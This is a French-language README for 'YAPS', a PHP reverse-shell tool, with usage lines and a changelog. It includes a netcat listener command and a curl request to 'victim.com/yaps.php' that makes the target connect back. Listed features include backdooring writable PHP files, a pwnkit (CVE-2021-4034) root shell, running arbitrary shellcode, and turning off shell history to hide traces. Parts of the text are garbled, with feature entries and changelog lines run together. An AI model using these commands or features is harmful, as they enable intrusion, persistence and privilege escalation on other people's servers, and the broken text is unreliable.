
Yet Another PHP Shell - Le shell inversé PHP le plus complet

Oui, comme son nom l'indique, il s'agit d'un autre reverse shell PHP, un de plus parmi des centaines disponibles, mais avec quelques avantages. C'est un seul fichier PHP contenant toutes ses fonctions et vous pouvez le contrôler via un simple écouteur TCP (par exemple nc -lp 1337).
Dans la version actuelle (1.5), ses principales fonctions ne prennent en charge que les systèmes Linux, mais je prévois de le faire fonctionner aussi sous Windows.
Il est actuellement dans sa première version et je ne l'ai pas encore beaucoup testé, et il y a encore beaucoup de choses que j'ai l'intention de faire et d'améliorer pour les prochaines versions (ce n'est pas encore fini !), alors n'hésitez pas à me faire savoir si vous avez trouvé des bugs ou si vous avez des suggestions de fonctionnalités ou d'améliorations. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s ou yaps.php?silent pour supprimer la bannièrephp yaps.php ip port!help - Afficher le menu d'aide!all-colors - Activer/désactiver toutes les couleurs (compatible avec les TTY sans couleur)!color - Activer/désactiver la couleur du PS1 (uniquement local, aucune variable d'environnement n'est modifiée)!duplicate - Générer une autre connexion YAPS!enum - Télécharger LinPEAS et LinEnum dans /tmp et les préparer à l'emploi!info - Lister les informations sur la cible (l'énumération mentionnée ci-dessus)!infect - Infecter les fichiers PHP inscriptibles avec des backdoors!interactive - Générer des shells inverses interactifs sur d'autres ports (fonctionne avec sudo, su, mysql, etc.)!passwd - Option de mot de passe (activer, désactiver, définir, modifier)




v1.5 - 12/02/2022
!shellcode pour recevoir et exécuter un shellcode arbitraireduplicate() (vous pouvez désormais spécifier une plage de ports)stabilize à interactivev1.4 - 04/02/2022
!pwnkit pour exploiter CVE-2021-4034 et générer un shell racine inverseverify_update()v1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect pour infecter des fichiers PHP avec des backdoors!stabilize (correction de bugs)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate pour générer un autre shell--update|-u)--help|-h)php yaps.php ip port)v1.1 - 12/07/2021
!all-colors pour activer/désactiver les couleurs du terminal et fonctionner avec des TTY sans couleurexit pour fermer le socket (quitter le shell)!stabilize pour désactiver HISTSIZE et HISTFILE!infov1.0.1 - 08/07/2021
[x,y,z] en array(x,y,z) pour améliorer la compatibilité avec les anciennes versions de PHPCertaines idées ont été inspirées par ces outils :
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!php - Écrire et exécuter du PHP sur l'hôte distant!pwnkit - Tenter d'exploiter CVE-2021-4034 et générer un shell racine inverse!shellcode - Envoyer et exécuter du shellcode sur l'hôte distant!suggester - Télécharger Linux Exploit Suggester dans /tmp et le préparer à l'emploi


